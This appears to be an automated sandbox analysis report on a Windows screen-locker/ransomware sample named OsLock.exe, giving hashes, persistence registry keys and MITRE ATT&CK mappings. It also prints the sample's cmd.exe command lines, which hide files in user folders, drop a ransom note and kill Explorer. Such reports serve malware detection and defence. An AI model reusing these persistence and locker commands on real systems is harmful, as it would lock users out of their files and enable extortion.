Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 09:20
Static task
static1
Behavioral task
behavioral1
Sample
OsLock.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
OsLock.exe
Resource
win10v2004-20241007-en
General
-
Target
OsLock.exe
-
Size
385KB
-
MD5
675ea787630f596da0474830ffb49723
-
SHA1
c8e18cbc3cca1ded47eb5860a71b9f22d46409e1
-
SHA256
ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf
-
SHA512
fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d
-
SSDEEP
6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
OsLock.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" OsLock.exe -
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
OsLock.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" -startup" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --init" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" /setup" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --wininit" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_1 = "AWindowsService.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_3 = "windowsx-c.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_4 = "System.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_5 = "_default64.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_6 = "native.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_7 = "ux-cryptor.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_2 = "taskhost.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN32_8 = "crypt0rsx.exe" OsLock.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exedescription ioc Process File opened for modification C:\Users\Public\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Documents\desktop.ini attrib.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
Processes:
cmd.execmd.execmd.execmd.execmd.execmd.exepid Process 1764 cmd.exe 4544 cmd.exe 4308 cmd.exe 3480 cmd.exe 2432 cmd.exe 4104 cmd.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 3440 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
OsLock.exepid Process 3172 OsLock.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
OsLock.exetaskkill.exedescription pid Process Token: SeDebugPrivilege 3172 OsLock.exe Token: SeDebugPrivilege 3440 taskkill.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
OsLock.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid Process procid_target PID 3172 wrote to memory of 4104 3172 OsLock.exe 83 PID 3172 wrote to memory of 4104 3172 OsLock.exe 83 PID 3172 wrote to memory of 2432 3172 OsLock.exe 84 PID 3172 wrote to memory of 2432 3172 OsLock.exe 84 PID 3172 wrote to memory of 1764 3172 OsLock.exe 85 PID 3172 wrote to memory of 1764 3172 OsLock.exe 85 PID 3172 wrote to memory of 3480 3172 OsLock.exe 86 PID 3172 wrote to memory of 3480 3172 OsLock.exe 86 PID 3172 wrote to memory of 4308 3172 OsLock.exe 87 PID 3172 wrote to memory of 4308 3172 OsLock.exe 87 PID 3172 wrote to memory of 4544 3172 OsLock.exe 88 PID 3172 wrote to memory of 4544 3172 OsLock.exe 88 PID 3172 wrote to memory of 3440 3172 OsLock.exe 89 PID 3172 wrote to memory of 3440 3172 OsLock.exe 89 PID 4544 wrote to memory of 2532 4544 cmd.exe 97 PID 4544 wrote to memory of 2532 4544 cmd.exe 97 PID 4104 wrote to memory of 1128 4104 cmd.exe 98 PID 4104 wrote to memory of 1128 4104 cmd.exe 98 PID 1764 wrote to memory of 2072 1764 cmd.exe 99 PID 1764 wrote to memory of 2072 1764 cmd.exe 99 PID 2432 wrote to memory of 944 2432 cmd.exe 100 PID 2432 wrote to memory of 944 2432 cmd.exe 100 PID 3480 wrote to memory of 1872 3480 cmd.exe 101 PID 3480 wrote to memory of 1872 3480 cmd.exe 101 PID 1764 wrote to memory of 2528 1764 cmd.exe 102 PID 1764 wrote to memory of 2528 1764 cmd.exe 102 PID 3480 wrote to memory of 3820 3480 cmd.exe 103 PID 3480 wrote to memory of 3820 3480 cmd.exe 103 PID 2432 wrote to memory of 808 2432 cmd.exe 104 PID 2432 wrote to memory of 808 2432 cmd.exe 104 PID 4308 wrote to memory of 3976 4308 cmd.exe 105 PID 4308 wrote to memory of 3976 4308 cmd.exe 105 PID 4104 wrote to memory of 3496 4104 cmd.exe 106 PID 4104 wrote to memory of 3496 4104 cmd.exe 106 PID 4544 wrote to memory of 1176 4544 cmd.exe 107 PID 4544 wrote to memory of 1176 4544 cmd.exe 107 PID 4308 wrote to memory of 4548 4308 cmd.exe 108 PID 4308 wrote to memory of 4548 4308 cmd.exe 108 -
Views/modifies file attributes 1 TTPs 12 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid Process 2528 attrib.exe 3976 attrib.exe 3496 attrib.exe 2532 attrib.exe 1872 attrib.exe 944 attrib.exe 808 attrib.exe 3820 attrib.exe 1176 attrib.exe 4548 attrib.exe 1128 attrib.exe 2072 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\OsLock.exe"C:\Users\Admin\AppData\Local\Temp\OsLock.exe"1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D3⤵
- Views/modifies file attributes
PID:1128
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:3496
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:944
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:808
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2072
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2528
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1872
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:3820
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4308 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:3976
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:4548
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D3⤵
- Views/modifies file attributes
PID:2532
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:1176
-
-
-
C:\Windows\SYSTEM32\taskkill.exetaskkill.exe /im Explorer.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3440
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
56B
MD5d1ff8c6f248822be938086bed3d42dee
SHA10726de2bc7fc3bc36c8b7b8c2a85b937a1defe31
SHA256e0c3bba5f6dacba97a25bf375c90c838c9d95f56ed6aa869f93a11c2424b7690
SHA5128ea5e3ce9e36231cfeddafbbd523ecc602beaaecfe403a66ffd11c19ab880004c98cfabad1c080d1800c96533d50f649c1be4ff1bf3a99f960464cc853921d0b